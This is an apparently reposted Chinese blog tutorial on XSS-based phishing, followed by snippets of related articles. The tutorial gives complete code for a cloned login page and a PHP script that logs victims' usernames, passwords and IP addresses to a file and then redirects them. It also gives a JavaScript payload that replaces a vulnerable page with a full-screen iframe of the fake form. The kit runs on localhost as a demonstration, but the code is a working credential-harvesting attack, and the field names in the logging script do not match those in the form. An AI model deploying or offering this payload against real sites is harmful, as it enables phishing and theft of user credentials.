XSS漏洞钓鱼

最新推荐文章于 2024-09-04 21:07:46 发布
最新推荐文章于 2024-09-04 21:07:46 发布
阅读量489 收藏 3
点赞数
文章标签: web
原文链接:http://blog.icxun.cn/Note/350.html
版权

首先先准备一个登陆环境

login.php 登录页面文件
hack.html 钓鱼用登录页面,与正常登录页面前端相同
hack.php 用于接受保存钓鱼页面传输的数据
payload.js 用于覆盖原有登录页面

1、首先先做一个简单的登陆页面

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title></title>
  </head>
  <body>
    登录界面</br>
    <form action="127.0.0.1/login.php" method="post">
      <input type="text" name="user" value="UserName">
      <input type="text" name="pass" value="PassWord">
      <input type="submit" name="name" value="login">
    </form>
	<script src="http://127.0.0.1/xsshack/payload.js"></script>
  </body>
</html>

2、然后再做一个钓鱼页面,但是表单提交的地址变为我们可以控制的页面,其余的与登陆页面相同

<!DOCTYPE html>
    <html>
      <head>
    <meta charset="utf-8">
    <title>xxx用户登录(钓鱼页面)</title>
      </head>
      <body>
    
http://127.0.0.1/hack.php" method="post">

      xxxx登录页面(钓鱼页面)<br>
      <input type="text" name="user" value=""><br>
      <input type="password" name="pass" value=""><br>
      <input type="submit" name="Login" value="Login">
    </form>
      </body>
    </html>

3、我们还需要一个接受保存的密码的脚本,也就是上边的hack.php文件,代码如下:

<?php
$str=' ';
$str.='name: ' .$_POST['userName'] . ' | ';
$str.=' pwd:' .$_POST['password'] . ' | ';
$str.=' ip:' . $_SERVER["REMOTE_ADDR"] . ' | ';
$str.=' time:' . date("m-d-h:i");
file_put_contents('password.txt',$str.PHP_EOL, FILE_APPEND);
header("location:http://www.baidu.com");
?>

4、构造一段代码payload.js,实现覆盖原有页面并调用我们的钓鱼页面进行覆盖,代码如下:

document.body.innerHTML='<div style="position:absolute;top:0px;left:0px;width:100%;height:100%">'+
'<iframe src=http://127.0.0.1/xsshack/hack.html width=100% height=100%>' +
'</iframe></div>';

5、然后我们可以利用页面的XSS将利用代码插入到正常页面,通过利用代码远程调用我们的javascript文件,覆盖正常登录页面,这里只是演示,我们直接将利用代码加入到正常登陆页面内

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title></title>
  </head>
  <body>
    登录界面</br>
    <form action="127.0.0.1/login.php" method="post">
      <input type="text" name="user" value="UserName">
      <input type="text" name="pass" value="PassWord">
      <input type="submit" name="name" value="login">
    </form>
	<script src="http://127.0.0.1/xsshack/payload.js"></script>
  </body>
</html>

6、此时当我们访问登录页面时,就会跳到我们的钓鱼页面。
在这里插入图片描述 通过源代码可以不难看出,整个页面已经被一个iframe框架覆盖,并且数据提交地址已经改变
现在我们在输入账号密码登录时数据已经提交到我们的服务器并进行了保存,然后URL跳到了我们指定的地址。

SQL+XSS漏洞修复方案
04-13
总之,SQL注入和XSS漏洞的修复需要开发者具备良好的安全意识,并在编程时遵循最佳实践。通过使用预编译语句、输入验证和内容转义,我们可以大大降低这些风险,保护用户的个人信息和系统的完整性。在实际项目中,定期...
xss跨站脚本攻击姿势大全
qq_56438857的博客
05-25 1086
xss攻击的四十种姿势
Pikachu——Xss钓鱼
m0_60767986的博客
04-23 8105
前端js代码限制输入框只能提交20个字段,将它修改为100即可(当然,这是get型xss,可以直接在url传参处添加攻击语句)提交攻击语句后发现,跳转回了靶场首页,网页debug发现:第一:请求了指定的钓鱼页面的url,并在后面携带了我的cookie信息第二:跳转回靶场首页(前面“靶场cookie获取的额外操作”的结果,用来抵消受害者的怀疑)
利用XSS漏洞钓鱼获取用户密码(一次失败的记录)
最新发布
weixin_73049307的博客
09-04 450
在锤子在线工具网站中的HTML在线运行中编写个简单的html网页,点击“示例源代码”再保留基础的代码,并在<body></body>间插入刚才复制的配置代码中的一个例子:<sCRiPt/SrC=//xs.pe/6b6></ScrIpT>因为是在线实时演示预期html网页结果的,所以刚插入好代码就可以听到“已上线”的语音提示,当然关掉网页就会听到“已下线”的语音。去后台的”钓鱼结果“中看一下,发现没有出现,奇怪了,按理说是会出现cookie记录的啊?(注意:这里需要自己添加一个</ScrIpT>)
XSS跨站脚本攻击之——XSS钓鱼测试
温柔小薛的博客
04-05 813
XSS钓鱼测试 钓鱼攻击利用页面 D:\phpStudy\WWW\pikachu\pkxss\xfish 使用存储型xss实验 目录下文件解读 fish.php 容错 用户密码为空的话 定义html类型,编码类型 ”basic“认证,弹出对话框,要求输入账号密码 http协议1.0 当不输账号密码,出现401错误 返回 ...
WEB攻防-通用漏洞&XSS跨站-表单劫持&钓鱼捆绑
m0_65336233的博客
10-13 1253
WEB攻防-通用漏洞&XSS跨站-表单劫持&钓鱼捆绑
php iframe使用代理_使用无括号的XSS绕过CSP策略研究
weixin_39850697的博客
12-06 316
学习基于Arbitrary Parentheses-less XSS against strict CSP policies研究目标绕过一个严格CSP策略default-src ‘self’;script-src ‘self’;技巧点一,无CSP的前提下执行任意XSS payloadwindow.name=eval(alert(1))location=name说明:window.name...
xss漏洞讲解.pdf
04-22
XSS漏洞,全称为跨站脚本攻击(Cross-Site Scripting),是一种常见的网络安全漏洞。它允许攻击者将恶意脚本代码注入到正常的网页之中,当其他用户浏览这些网页时,嵌入在其中的恶意脚本就会执行,从而达到攻击者的...
xss平台搭建源码,xss漏洞练习
06-03
4. 实践利用XSS漏洞进行攻击,如钓鱼、会话劫持、cookies盗窃等,并学习如何防止这些攻击。 四、进一步学习资源 1. OWASP XSS Prevention Cheat Sheet:提供有效的防御XSS攻击的建议。 2. W3Schools JavaScript教程...
JSP安全开发之XSS漏洞详解
10-21
7. **代码审查**:定期进行代码审查,检查可能的XSS漏洞,并确保所有用户输入都经过了适当的安全处理。 8. **安全编码最佳实践**:遵循安全编码原则,例如,避免在HTML中动态生成JavaScript,而是将其放在外部文件...
YXcms-含有存储型XSS漏洞的源码包
03-17
"YXcms-含有存储型XSS漏洞的源码包" 这个标题揭示了我们要讨论的核心内容。YXcms是一个内容管理系统(CMS),它不幸地包含了存储型跨站脚本(Stored XSS)的安全漏洞。存储型XSSXSS攻击的一种类型,这种漏洞通常...
6.XSS-钓鱼攻击展示(存储型xss
愿听风成曲
06-24 284
将上面的script攻击代码输入到留言板里面进行提交,就会出现弹窗进行输入账号和密码,每次刷新都会弹窗。在存在存储型xss漏洞的网页上,输入以上代码,永久性存储在网页前端,如果用户警惕不是很高,就会中招。钓鱼攻击利用页面 D:\phpStudy\WWW\pikachu\pkxss\xfish。代码意思:就是将用户输入的账号信息发送到攻击者的平台上。当用户输入账号和密码,确定以后就会直接提交到攻击的平台上。现在攻击者平台没有任何信息。
利用XSS进行网页钓鱼
Monsterlz123的博客
07-22 6744
XSS漏洞】利用XSS进行网页钓鱼 Hello 各位小伙伴周末晚上好 这里是你们微胖的小编Monster。 话说小编的老妈今天给小编打电话,叮嘱我平时吃饭少吃一点… 说昨天看我朋友圈发的照片,已经从以前的瓜子脸,变成国字脸了… Whatever,让我们一起来看看今天的内容吧 一、实验概述 实验拓扑: 利用XSS漏洞,我们可以在网页中插入恶意js代码,通过js代码,我们可以干很多事情,例...
xss漏洞钓鱼
rescure的博客
01-21 1076
利用xss漏洞钓鱼 简要:由于资金问题,没有自己的网站,故在此用xss平台和dvwa实现xss反射型钓鱼操作 NO.1 正常进入dvwa,模式选择为low,使用xss(refelect) 进入xss平台,选择创建项目,在此为dvwa,创建之后,选择功能默认即可 ,随后平台会生成自己的js代码 NO.2 接下来,复制生成的js代码,粘贴至xss漏洞处(具体情况需要自己分析是什么类型的) 接下来就是copy大法了 ...
关于HTML 代码注入,XSS攻击问题解决
帅大叔的博客
10-19 3万+
大部分的网站一般都有评论功能或留言功能,或类似可以让用户写东西的地方。如果后台不经过处理,又把数据返回前端,这就会出问题了。网页解析器会把用户的信息也当成html代码给解析了。如果用户写的是一些恶意的 js 脚本这是很危险的。专业术语叫:XSS 攻击一、举个例子:假设后台和前台都没有对用户的信息,进行处理。我们输入如下的代码:<script> var body= document.body;
关于DOM型XSS漏洞的学习笔记
热门推荐
Mi1k7ea
03-05 4万+
DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。 DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。 在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个
InnerHTML属性的XSS利用
weixin_34184158的博客
09-13 1086
来自:http://www.myhack58.com/Article/html/3/7/2011/32395.htm innerHTML 是个奇怪的HTML属性,不是W3C标准支持的,但几乎所有的厂商都默认支持了这样一个属性,最近一些用这个属性试验了很多,这里来分享下 innerHTML一些有意思的问题。所有的元素都有innerHTML属性,它是一个字符串,用来设置或获取位于对象起始和结束标签内...
漏洞复现篇——利用XSS漏洞获取cookie
爱国小白帽
02-20 3064
实验环境: PHPstudy 火狐浏览器、IE DVWA靶场
XSS漏洞详解与防御策略
XSS漏洞是网络攻击者常用的一种手段,通过在网页中注入恶意代码,当用户访问这些被篡改的页面时,恶意代码会在用户的浏览器中执行,从而使得攻击者能够控制用户浏览器,甚至窃取敏感信息。XSS漏洞主要分为三类:反射...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值